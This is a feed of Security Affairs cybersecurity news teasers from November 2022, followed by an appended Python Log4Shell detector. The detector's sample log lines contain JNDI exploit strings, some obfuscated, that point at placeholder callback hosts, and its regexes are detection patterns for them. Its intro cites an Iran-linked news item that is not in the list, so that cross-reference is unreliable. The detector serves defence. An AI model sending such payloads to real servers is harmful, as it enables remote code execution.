$1 billion of FTX customer funds have vanished, Reuters reported
Crypto exchange FTX appears to have been hacked; rumors state that attackers drained $600 million from the company's wallets. Crypto exchange FTX is recommending that users delete the FTX apps and avoid using its website, a circumstance that lends weight to the rumors of a $600 million crypto heist. The owners of several wallets […]
2022-11-12T17:37:30+00:00 https://securityaffairs.co/wordpress/138449/digital-id/ftx-alleged-hack.html

Malicious app in the Play Store spotted distributing Xenomorph Banking Trojan
2022-11-12T14:53:58+00:00 https://securityaffairs.co/wordpress/138440/malware/xenomorph-banking-malware-play-store.html

Canadian supermarket chain giant Sobeys suffered a ransomware attack
Sobeys, the second-largest supermarket chain in Canada, was the victim of a ransomware attack conducted by the Black Basta gang. Sobeys Inc. is the second largest supermarket chain in Canada; the company operates over 1,500 stores across Canada under a variety of banners. It is a wholly-owned subsidiary of Empire Company Limited, a Canadian business conglomerate.
During […]
2022-11-12T11:35:10+00:00 https://securityaffairs.co/wordpress/138424/cyber-crime/sobeys-ransomware-attack.html

An initial access broker claims to have hacked Deutsche Bank
An initial access broker claims to have hacked Deutsche Bank and is offering access to its systems for sale on Telegram. A threat actor (0x_dump) claims to have hacked the multinational investment bank Deutsche Bank and is offering access to its network for sale online. The security researcher Dominic Alvieri was one of the first experts […]
2022-11-11T23:07:47+00:00 https://securityaffairs.co/wordpress/138416/data-breach/deutsche-bank-alleged-data-breach.html

Long-running surveillance campaigns target Uyghurs with BadBazaar and MOONSHINE spyware
Lookout researchers discovered two long-running surveillance campaigns targeting the ethnic minority Uyghurs. Researchers from mobile security firm Lookout uncovered two long-running surveillance campaigns targeting the Uyghur minority. The threat actors behind the campaigns used two Android spyware families to spy on the victims and steal sensitive information. The campaigns involved a new piece of malware called […]
2022-11-11T21:07:03+00:00 https://securityaffairs.co/wordpress/138395/intelligence/uyghurs-badbazaar-moonshine-surveillance.html

Man charged for role in LockBit ransomware operation
The U.S. DoJ charged a Russian-Canadian national for his alleged role in LockBit ransomware attacks against organizations worldwide. The U.S. Department of Justice (DoJ) charged Mikhail Vasiliev, a dual Russian and Canadian national, for his alleged participation in the LockBit ransomware operation.
According to the press release published by the DoJ, the man is currently in custody in […]
2022-11-11T11:54:05+00:00 https://securityaffairs.co/wordpress/138381/cyber-crime/man-charged-lockbit-ransomware-attacks.html

Researcher received a $70k award for a Google Pixel lock screen bypass
Google fixed a high-severity security bug affecting all Pixel smartphones that can allow attackers to unlock the devices. Google has addressed a high-severity security bug, tracked as CVE-2022-20465, affecting all Pixel smartphones that could be exploited to unlock the devices. The Google Pixel lock screen bypass was reported by security researcher David Schütz, who was […]
2022-11-11T10:04:15+00:00 https://securityaffairs.co/wordpress/138372/mobile-2/google-pixel-lock-screen-bypass.html

Russia-linked IRIDIUM APT linked to Prestige ransomware attacks against Ukraine
Microsoft linked Prestige ransomware attacks against organizations in Ukraine and Poland to Russia-linked threat actors. In mid-October, Microsoft Threat Intelligence Center (MSTIC) researchers uncovered previously undetected ransomware, tracked as Prestige, employed in attacks targeting organizations in the transportation and related logistics industries in Ukraine and Poland. The Prestige ransomware first appeared in the threat […]
2022-11-11T08:28:28+00:00 https://securityaffairs.co/wordpress/138362/apt/prestige-ransomware-linked-iridium.html

Apple out-of-band patches fix remote code execution bugs in iOS and macOS
Apple released out-of-band patches for iOS and macOS to fix a couple of code execution vulnerabilities in the libxml2 library.
Apple released out-of-band patches for iOS and macOS to address two code execution flaws, tracked as CVE-2022-40303 and CVE-2022-40304, in the libxml2 library for parsing XML documents. The two vulnerabilities were discovered by Google Project […]
2022-11-10T21:26:48+00:00 https://securityaffairs.co/wordpress/138355/security/apple-out-of-band-patches.html

Researchers warn of malicious packages on PyPI using steganography
Experts discovered a malicious package on the Python Package Index (PyPI) that uses steganography to hide malware within image files. CheckPoint researchers discovered a malicious package, named ‘apicolor,’ on the Python Package Index (PyPI) that uses steganography to hide malware within image files. The malicious package infects PyPI users through open-source projects on GitHub. The […]
2022-11-10T16:15:55+00:00 https://securityaffairs.co/wordpress/138342/security/malicious-package-pypi-steganography.html

A bug in ABB Totalflow flow computers exposed oil and gas companies to attack
A flaw in the ABB Totalflow system used in oil and gas organizations could be exploited by an attacker to inject and execute arbitrary code. Researchers from industrial security firm Claroty disclosed details of a vulnerability affecting ABB Totalflow flow computers and remote controllers.
Flow computers are used to calculate volume and flow rates for oil […]
2022-11-10T13:45:11+00:00 https://securityaffairs.co/wordpress/138331/security/abb-totalflow-flaw.html

APT29 abused the Windows Credential Roaming in an attack against a diplomatic entity
Russia-linked APT29 cyberespionage group exploited a Windows feature called Credential Roaming to target a European diplomatic entity. Mandiant researchers in early 2022 responded to an incident where the Russia-linked APT29 group (aka SVR group, Cozy Bear, Nobelium, and The Dukes) successfully phished a European diplomatic entity. The attack stands out for the use of the Windows Credential […]
2022-11-10T10:41:13+00:00 https://securityaffairs.co/wordpress/138322/apt/apt29-windows-credential-roaming.html

Lenovo warns of flaws that can be used to bypass security features
Lenovo fixed two high-severity flaws impacting various laptop models that could allow an attacker to deactivate UEFI Secure Boot. Lenovo has released security updates to address a couple of high-severity vulnerabilities impacting various ThinkBook, IdeaPad, and Yoga laptop models. An attacker can exploit the flaws to disable UEFI Secure Boot. Secure Boot is a security feature […]
2022-11-10T07:21:53+00:00 https://securityaffairs.co/wordpress/138312/security/lenovo-bypass-security-features.html

Surveillance vendor exploited Samsung phone zero-days
Google Project Zero researchers reported that a surveillance vendor is using three Samsung phone zero-day exploits.
Google Project Zero disclosed three Samsung phone vulnerabilities, tracked as CVE-2021-25337, CVE-2021-25369 and CVE-2021-25370, that have been exploited by a surveillance company. The researchers pointed out that the surveillance firm included in its spyware the […]
2022-11-09T20:51:43+00:00 https://securityaffairs.co/wordpress/138302/hacking/surveillance-vendor-exploited-samsung-phone-zero-days.html

Experts observed Amadey malware deploying LockBit 3.0 Ransomware
Experts noticed that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems. Researchers from AhnLab Security Emergency Response Center (ASEC) reported that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems. Amadey Bot is a data-stealing malware that was first spotted in 2018; it also allows […]
2022-11-09T13:31:43+00:00 https://securityaffairs.co/wordpress/138292/malware/amadey-malware-deploying-lockbit-3-0.html

Microsoft Patch Tuesday updates fix 6 actively exploited zero-days
Microsoft Patch Tuesday updates for November 2022 addressed 64 vulnerabilities, including six actively exploited zero-days.
Microsoft Patch Tuesday updates for November 2022 addressed 64 new vulnerabilities in Microsoft Windows and Windows Components; Azure and Azure Real Time Operating System; Microsoft Dynamics; Exchange Server; Office and Office Components; SysInternals; Visual Studio; SharePoint Server; Network Policy Server […]
2022-11-09T11:54:36+00:00 https://securityaffairs.co/wordpress/138288/security/microsoft-patch-tuesday-november-2022.html

VMware fixes three critical flaws in Workspace ONE Assist
VMware addressed three critical bugs in the Workspace ONE Assist solution that allow remote attackers to bypass authentication and elevate privileges. VMware has released security updates to address three critical vulnerabilities impacting the Workspace ONE Assist product. Remote attackers can exploit the vulnerabilities to bypass authentication and elevate privileges to admin. Workspace ONE Assist allows […]
2022-11-09T08:47:31+00:00 https://securityaffairs.co/wordpress/138283/security/vmware-workspace-one-assist-critical-bugs.html

Citrix ADC and Citrix Gateway are affected by a critical authentication bypass flaw
Citrix released security updates to address a critical authentication bypass vulnerability in Citrix ADC and Citrix Gateway. Citrix is urging customers to install security updates to address a critical authentication bypass issue, tracked as CVE-2022-27510, in Citrix ADC and Citrix Gateway.
The company addressed three vulnerabilities. “Note that only appliances that are operating […]
2022-11-08T21:52:41+00:00 https://securityaffairs.co/wordpress/138264/security/citrix-gateway-adc-flaws.html

SmokeLoader campaign distributes new Laplas Clipper malware
Researchers observed a SmokeLoader campaign that is distributing a new clipper malware dubbed Laplas Clipper that targets cryptocurrency users. Cyble researchers uncovered a SmokeLoader campaign that is distributing commodity malware, such as SystemBC and Raccoon Stealer 2.0, along with a new clipper malware tracked as Laplas. The experts detected more than 180 different samples of the clipper […]
2022-11-08T18:22:33+00:00 https://securityaffairs.co/wordpress/138251/malware/smokeloader-delivers-laplas-clipper.html

Medibank confirms ransomware attack impacting 9.7M customers, but doesn't pay the ransom
2022-11-08T09:45:36+00:00 https://securityaffairs.co/wordpress/138243/cyber-crime/medibank-confirms-ransomware-attack.html

US DoJ seizes $3.36B Bitcoin from Silk Road hacker
The U.S. Department of Justice announced that James Zhong, a hacker who stole 50,000 bitcoins from the Silk Road dark net marketplace, has pleaded guilty. The US Department of Justice announced that a man from Georgia, James Zhong, has pleaded guilty to wire fraud after stealing more than 50,000 bitcoins from the Silk Road.
Zhong pleaded guilty to money […]
2022-11-08T08:15:03+00:00 https://securityaffairs.co/wordpress/138228/cyber-crime/silk-road-hacker-pleads-guilty.html

'Justice Blade' Hackers are Targeting Saudi Arabia
2022-11-07T19:52:34+00:00 https://securityaffairs.co/wordpress/138213/hacking/justice-blade-targets-saudi-arabia.html

Robin Banks phishing-as-a-service platform continues to evolve
The phishing-as-a-service (PhaaS) platform Robin Banks migrated its infrastructure to DDoS-Guard, a Russian bulletproof hosting service. The phishing-as-a-service (PhaaS) platform Robin Banks was originally hosted on Cloudflare, but in July the company disassociated the Robin Banks phishing infrastructure from its services after being notified. The move caused a multi-day disruption to PhaaS operations; then the administrators […]
2022-11-07T18:00:06+00:00 https://securityaffairs.co/wordpress/138199/cyber-crime/robin-banks-phaas.html

Water sector in the US and Israel still unprepared to defeat cyber attacks
An expert warns that the US and Israel are still unprepared to defeat a cyber attack against organizations in the water sector.
Ariel Stern, a former Israeli Air Force captain, warns that the US and Israel are still unprepared to defeat a cyber attack against the water sector that could be orchestrated by enemy states like […]
2022-11-07T11:36:01+00:00 https://securityaffairs.co/wordpress/138185/hacking/water-sector-us-israel-cyberattacks.html

UK NCSC govt agency is scanning the Internet for flawed devices in the UK
The UK National Cyber Security Centre (NCSC) announced that it is scanning all Internet-exposed devices hosted in the UK for vulnerabilities. The United Kingdom's National Cyber Security Centre (NCSC) is scanning all Internet-exposed devices hosted in the United Kingdom for vulnerabilities. The UK agency aims to secure these devices by reporting the discovered vulnerabilities to their owners. […]
2022-11-07T07:33:17+00:00 https://securityaffairs.co/wordpress/138158/security/uk-ncsc-scans-internet.html

Abusing Microsoft Dynamics 365 Customer Voice in phishing attacks
Researchers uncovered a campaign abusing Microsoft Dynamics 365 Customer Voice to steal credentials from the victims. Microsoft's Dynamics 365 Customer Voice product allows organizations to collect customer feedback; it is used to conduct customer satisfaction surveys.
Researchers from cybersecurity firm Avanan uncovered a campaign abusing Microsoft Dynamics 365 Customer Voice to steal credentials from the […]
2022-11-07T06:05:45+00:00 https://securityaffairs.co/wordpress/138147/cyber-crime/microsoft-dynamics-365-customer-voice-phishing.html

LockBit 3.0 gang claims to have stolen data from Kearney & Company
2022-11-06T17:17:54+00:00 https://securityaffairs.co/wordpress/138136/cyber-crime/lockbit-ransomware-kearney-company.html

A cyberattack blocked the trains in Denmark
At the end of October, a cyber attack caused the trains to stop in Denmark; the attack hit a third-party IT service provider. A cyber attack caused the trains operated by DSB to stop in Denmark last weekend; threat actors hit a third-party IT service provider. The attack hit the Danish company Supeo […]
2022-11-06T13:51:03+00:00 https://securityaffairs.co/wordpress/138127/cyber-crime/cyberattack-blocked-trains-denmark.html

29 malicious PyPI packages spotted delivering the W4SP Stealer
Cybersecurity researchers discovered 29 malicious PyPI packages delivering the W4SP stealer to developers' systems. Cybersecurity researchers have discovered 29 packages in the official Python Package Index (PyPI) repository designed to infect developers' systems with an info-stealing malware dubbed W4SP Stealer.
“It appears that these packages are a more sophisticated attempt to deliver the W4SP Stealer on […]
2022-11-05T21:34:11+00:00 https://securityaffairs.co/wordpress/138113/hacking/pypi-packages-delivers-w4sp-stealer.html

Zero-days are exploited on a massive scale in increasingly shorter timeframes
Microsoft warns that threat actors are increasingly using publicly disclosed zero-day exploits in their attacks. According to the Digital Defense Report published by Microsoft, threat actors are increasingly leveraging publicly disclosed zero-day vulnerabilities to target organizations worldwide. The researchers noticed a reduction in the time between the announcement of a vulnerability and the commoditization of […]
2022-11-05T17:30:47+00:00 https://securityaffairs.co/wordpress/138100/security/treat-actors-zero-day.html

RomCom RAT campaigns abuse popular brands like KeePass and SolarWinds NPM
A new campaign spreading RomCom RAT impersonates popular software brands like KeePass and SolarWinds. The threat actor behind the RomCom RAT (remote access trojan) has refreshed its attack vector and is now abusing well-known software brands for distribution. Researchers from BlackBerry uncovered a new RomCom RAT campaign impersonating popular software brands like KeePass and SolarWinds. […]
2022-11-04T13:51:55+00:00 https://securityaffairs.co/wordpress/138091/hacking/romcom-rat-campaigns.html

The 10th edition of the ENISA Threat Landscape (ETL) report is out!
I'm proud to announce the release of the 10th edition of the ENISA Threat Landscape (ETL) on the state of the cybersecurity threat landscape.
The European Union Agency for Cybersecurity (ENISA) released its ENISA Threat Landscape 2022 (ETL) report, which is the annual analysis of the state of the cybersecurity threat landscape. This is the 10th edition of the […]
2022-11-04T10:09:39+00:00 https://securityaffairs.co/wordpress/138077/security/enisa-threat-landscape-2022.html
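The Iran-linked item above (Log4Shell, CVE-2021-44228, exploited against an FCEB organization) describes the kind of intrusion that usually leaves its first trace in web-server access logs. The block below is an added example written for this page; it is not code from Security Affairs, CISA or the FBI, and the access-log lines it scans are constructed for the example, not real traffic. It shows why a plain "jndi:" substring check is not enough: Log4j 2 lookup syntax lets an attacker write the string as nested ${lower:j}/${upper:n} lookups, as default-value tricks such as ${::-j} or ${env:NaN:-j}, or URL-encoded, so the detector normalizes those forms first and only then matches. The assumed log format is Apache combined style, and the set of obfuscations handled is a subset of what the lookup syntax allows (for instance ${date:...} and base64 payloads are not covered).

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in access logs.

Added example for this page, not code from the advisory it accompanies.
Sample log lines are constructed; the format assumed is Apache "combined".
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Line 1 is benign;
# lines 2..5 carry a JNDI lookup in plain, nested-lookup, URL-encoded and
# default-value-trick form respectively.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Nov/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Nov/2022:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.8 - - [14/Nov/2022:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-l}${::-d}${::-a}${::-p}://203.0.113.10:1389/a}"',
    '198.51.100.9 - - [14/Nov/2022:10:01:05 +0000] '
    '"GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.11%3A1099%2Fobj%7D HTTP/1.1" 200 512 "-" "curl/7.85"',
    '198.51.100.10 - - [14/Nov/2022:10:01:06 +0000] "GET / HTTP/1.1" 200 512 '
    '"${${env:NaN:-j}ndi:dns://203.0.113.12/x}" "Mozilla/5.0"',
]

# ${lower:x} / ${upper:x} evaluate to the single character x. We keep the
# character as written because the final match is done on lowercased text.
_CASE_FUNC = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
# ${key:-default}: an undefined key (including the empty key in ${::-x})
# evaluates to the default string, which is how attackers spell "jndi".
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The normalized lookup we are actually looking for: ${jndi:<proto>:<target>}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:(.*?)\}")


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and collapse lookup tricks used to hide 'jndi'."""
    for _ in range(3):  # tolerate double encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    # Innermost lookups resolve first, so repeat until nothing changes.
    for _ in range(max_rounds):
        new = _CASE_FUNC.sub(lambda m: m.group(1), text)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text.lower()


def find_jndi_lookups(lines):
    """Return (line_number, protocol, target) for each line with a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for m in _JNDI.finditer(normalize(line)):
            hits.append((n, m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    for n, proto, target in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {n}: jndi lookup via {proto} -> {target}")
```

Run against the embedded sample, the detector reports lines 2 through 5 and identifies ldap, ldap, rmi and dns as the lookup protocols; the benign first line produces no hit. The target field is what you would pivot on next (the callback host and port the exploit tried to reach), and any hit in a header an attacker controls (User-Agent, X-Forwarded-For, the query string) on a host that actually runs a vulnerable Log4j 2 is worth treating as a likely compromise rather than a scan.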